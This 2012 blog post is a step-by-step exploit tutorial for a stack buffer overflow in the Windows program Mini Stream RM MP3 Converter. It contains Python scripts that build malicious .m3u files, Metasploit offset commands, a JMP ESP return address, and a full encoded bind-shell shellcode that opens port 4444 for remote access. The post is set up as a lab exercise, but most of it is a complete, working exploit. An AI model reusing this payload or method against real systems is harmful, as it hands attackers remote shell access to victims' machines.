Saturday, February 11, 2012

Exploitation via Buffer Overflow Vulnerability - Stack Based Overflow (Case Study: Buffer Overflow in Mini Stream RM MP3 Converter)

In this case we will try to explore the buffer overflow in one of Windows Application - Mini Stream RM MP3 Converter, so we can exploit the OS via this vulnerability.

Before it, we need this kinds of software and tools :
1. Mini Stream RM MP3 Converter, you can download it in http://mini-stream.net/rm-to-mp3-converter/download/
2. Ollydbg for debugger , download it in http://www.ollydbg.de/
3. Metaexploit Framework (included in Backtrack)

After you download the first and second application, you can install it in Windows OS (you can use Windows in Virtual Machine).

The following step to exploit the application is :
1. The first step is creating the fuzzer to make buffer overflow the Mini Stream application. We will create python script that will generate .m3u file that content many characters that will be read by the application. Because we need to try in how many characters the application will be crash, we will create .m3u file having 1000, 10000, and 20000 characters.

Now let's start to create the fuzzer file...
-----------------------------------------------------------------
jml = [1000,10000,20000];
for i in jml:
    stri = str(i)
    buffer = "protocol://"
    buffer += "\x41" * i;
    filename = "dicoba" + stri + "kali" + ".m3u";
    file = open(filename,"w")
    file.writelines(buffer)
    file.close()
-----------------------------------------------------------------

Save it with file name: fuzzerministream.py, then run the file by typing : #python fuzzerministream.py.

You can see that the three new .m3u files (dicoba1000kali.m3u, dicoba10000kali.m3u, dicoba20000kali.m3u) have been created. (type  #ls to see the list of file).

NB : The file is used as media to exploit Windows OS, and it will work if it opened by Mini Stream RM MP3 Converter application.


2. The next step is copying the file to Windows OS (you can use ssh), and open it via Mini Stream Converter. After trying open the three files, we have known that the application is closed suddenly when open dicoba20000kali.m3u and dicoba50000kali.m3u. It's mean that the application is being crashed if about 20000 characters input is processed.

Now, let's use Ollydbg ...
Open the Mini Stream RM MP3 Converter, Open Ollydbg, Attach Mini Stream RM MP3 Converter (File - Attach - Choose Stream RM MP3 Converter).
Load  dicoba20000kali.m3u, and we will see that EIP is overwrited by "A" (41) characters.

3. To know in what number of character the EIP is overwrited. Let's change the "A" input by pattern input. We can create the pattern input using Metasploit tool (pattern_create), then save it in pattern.txt.
Type : #/pentest/exploits/framework/tools/pattern_create.rb 20000 > pattern.txt

Change content of variable "buffer" in fuzzer file into pattern character in pattern.txt. So, the fuzzer code after modified become :

-----------------------------------------------------------------
buffer = "protocol://"
buffer += "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7..."
filename = "bikinkacau" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
-----------------------------------------------------------------

This fuzzer code create bikinkacau.m3u file. Run it by typing #python fuzzerministream.py and bikinkacau.m3u will be created, then copy it into Windows OS.


 4. Run Mini Stream RM MP3 Converter application and attach it with Ollydbg. Load bikinkacau.m3u and we can know that the value of the EIP and ESP overwritten with the pattern character.

5. Let's analyze in what number of input, the EIP and ESP have been overwritten. We can use pattern_offset to do that.
EIP  : #/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000
ESP : #/pentest/exploits/framework/tools/pattern_offset.rb 69573469 20000

We have known that EIP have been overwritten after 17413 byte (17414, 17415, 17416, 17417), and ESP after 1421 byte.

Let's modify the fuzzer code to see whether we can overwrite EIP or not.

-----------------------------------------------------------------
buffer = "protocol://"
buffer += "\x90" * 17413
buffer += "\xEF\xBE\xAD\xDE"
buffer += "\x90" * (17421 - len(buffer))
buffer += "\xCC" * (20000 - len(buffer))
filename = "bikinkacau" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
-----------------------------------------------------------------

This fuzzer will be send input "\x90" (NOP - No Operation) as many as 17413 byte, then fill EIP with "DEADBEEF", and overwrite four byte in register ESP with "\x90" (17421 - (17413 + 4)), then send "\xCC" into buffer.

6. Run #python fuzzerministream.py and copy the new bikinkacau.m3u into Windows OS. Load it with Mini Stream RM MP3 Converter attached by Ollydbg.


We can see that value of EIP is overwritten by "DEADBEEF" and the buffer content is "CCCCCCCC", so we have been successful in overwriting EIP and ESP value.
Because register ESP can access buffer (stack) in memory, so it is very appropriate used as stepped stone for EIP to access payload.

To do it we need JMP command (use to move intruction from one register to another). So, we have to looking for location of JMP ESP in Mini Stream RM MP3 Converter. We can search it in shell32.dll using Ollydbg...

Run Ollydbg and Mini Stream RM MP3 Converter, then attach Mini Stream RM MP3 Converter in Ollydbg..

Click view - executable module (or pres ALT + E)..


Open modul shell32.dll by double click it ...

Search JMP ESP by right click - Search for Command (or press Ctrl + F), then write JMP ESP


We know that the JMP ESP have memory address 7C9D30D7 in shell32.dll, so let's change DEADBEEF value into it.

 7. The next step is preparing payload using to exploit Windows OS when Mini Stream RM MP3 Converter active. We will use Metasploit Frameork that cab be accessed using msfweb.
Type : #/pentest/exploits/framework2/msfweb


Now open via web browser : http://127.0.0.1:55555/
Click tab Payloads - Choose "os :: win32" in Filter Modules Options - Click Filter Modules button.


There are some Windows OS payload, in this case we use Windows Bind Shell. After that, fill the configuration for the payload. In "EXITFUNC DATA Required" type process, in "LPORT Required PORT" type 4444. Port 4444 is used as listening port connecting the attacker and the victim. Fill bad character textbox with "0x00 0x0a 0x0d 0x40". For encoder chooseMsf::Encoder::Shikataganai.





Click Generate Payload button. It will create opcode from payload.


Put the opcode payload into file fuzzer (fuzzerministream.py)

-----------------------------------------------------------------
buffer = "protocol://"
buffer += "\x90" * 17413

buffer += "\xD7\x30\x9D\x7C"
buffer += "\x90" * 32
buffer += ("\x29\xc9\xb1\x51\xdb\xd4\xd9\x74\x24\xf4\x5f\xbe\x6a\x48\xb8\xc7"
"\x31\x77\x13\x03\x77\x13\x83\xad\x4c\x5a\x32\xcd\x27\x71\xf0\xc5"
"\x41\x7a\xf4\xea\xd2\x0e\x67\x30\x37\x9a\x3d\x04\xbc\xe0\xb8\x0c"
"\xc3\xf7\x48\xa3\xdb\x8c\x10\x1b\xdd\x79\xe7\xd0\xe9\xf6\xf9\x08"
"\x20\xc9\x63\x78\xc7\x09\xe7\x87\x09\x43\x05\x86\x4b\xbf\xe2\xb3"
"\x1f\x64\x23\xb6\x7a\xef\x6c\x1c\x84\x1b\xf4\xd7\x8a\x90\x72\xb8"
"\x8e\x27\x6e\x45\x83\xac\xf9\x25\xff\xae\x98\x76\xce\x15\x3e\xf3"
"\x72\x9a\x34\x43\x79\x51\x3a\x5f\x2c\xee\xfb\x57\x70\x99\x75\x29"
"\x82\xb5\xda\x4a\x4c\x23\x88\xd2\x19\x9f\x1c\x72\xad\xac\x52\xdd"
"\x05\xac\x43\x89\x6e\xbf\x98\x72\x21\xbf\xb7\xdb\x48\xda\x5e\x62"
"\xa7\x2d\x9d\x31\x52\x2c\x5e\x69\xca\xe9\xa9\x7c\xa6\x5d\x55\xa8"
"\xea\x32\xfa\x07\x5e\xf6\xaf\xe4\x33\x07\x9f\x8c\xdb\xe6\x7c\x36"
"\x4f\x80\x9c\x23\x07\x36\x44\x3b\x1f\x61\x86\x6d\xf5\x9e\x29\xc4"
"\xf5\x4f\xa1\x42\xa4\x5e\xdb\xdd\x48\x48\x48\xb4\x49\xa5\x07\xd3"
"\xff\xc0\x91\x4c\xff\x1b\x71\x26\xab\xf6\x8d\x16\xc0\x91\x96\xef"
"\x21\x18\x0e\xf0\x78\x8e\x4f\xde\xe3\x5b\xd4\xb8\x83\xf8\x79\xcd"
"\xb1\x95\xd1\x94\x10\xa6\x5b\xc1\x09\x72\xd5\xef\xff\xba\x16\x45"
"\x01\x78\xf4\x67\xbc\x51\x95\x1a\x3b\x92\x32\x8f\x17\x8a\x36\x31"
"\xd4\x5d\x48\xb8\x5f\x9d\x60\x19\x37\x33\xdc\xcc\xe6\xd9\xdf\xbf"
"\x59\x4b\xb1\xc0\x8a\x1b\x9c\xe7\x2e\x12\x8d\xe8\xe7\xc0\xcd\xe9"
"\x3f\xea\xe2\x9e\x17\xe8\x80\x64\xf3\xef\x51\x36\x03\xdf\x36\xc8"
"\x23\x02\xb5\x67\x2b\x15\xc5\x57")
filename = "bikinkacau" + ".m3u"
file = open(filename,"w")
file.writelines(buffer)
file.close()
-----------------------------------------------------------------

8. Now, let's try the fuzzer containing opcode payload. Run fuzzerministream.py - copy bikinkacau.m3u to Windows OS - Run Mini Stream RM MP3 Converter. Then let's see what happen when we try to connected via telnet by writing # telnet 192.168.56.101 4444


Alhamdulillah, we have success to exploit Windows OS system via Mini Stream RM MP3 Converter application...









0 komentar:

Post a Comment